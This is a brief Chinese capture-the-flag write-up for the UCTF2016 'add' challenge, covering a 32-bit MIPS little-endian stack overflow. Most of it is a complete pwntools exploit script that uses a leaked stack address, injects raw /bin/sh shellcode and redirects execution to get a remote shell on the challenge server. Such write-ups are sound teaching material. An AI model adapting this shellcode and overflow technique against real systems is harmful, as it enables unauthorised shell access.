Add

nc pwn2.jarvisoj.com 9889

 

题目来源：UCTF2016

 

add.1f54e2c8b9396f83a4be2632bcb3a5f5

 

32位mipsel架构栈溢出

当输入特殊的数的时候会给栈地址

在栈里写入shellcode，并跳转执行即可

exp如下：

from pwn import *

#io = process(['qemu-mipsel', '-L', '/usr/mipsel-linux-gnu/', './add'])
io = remote('pwn2.jarvisoj.com', 9889)
challenge = 2057561479

io.sendline(str(challenge))
io.recvuntil('Your input was ')
buf_addr = int(io.recvline().strip(), 16)
info("buf_addr:" + str(hex(buf_addr)))

shellcode = b"\xff\xff\x10\x04\xab\x0f\x02\x24"
shellcode += b"\x55\xf0\x46\x20\x66\x06\xff\x23"
shellcode += b"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
shellcode += b"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
shellcode += b"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
shellcode += b"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
shellcode += b"/bin/sh\0"

payload = b'a' * 8 + shellcode
payload = payload.ljust(0x70, b'\x00')
payload += p32(buf_addr + 8)
io.sendline(payload)

sleep(0.5)
io.sendline("exit")

io.interactive()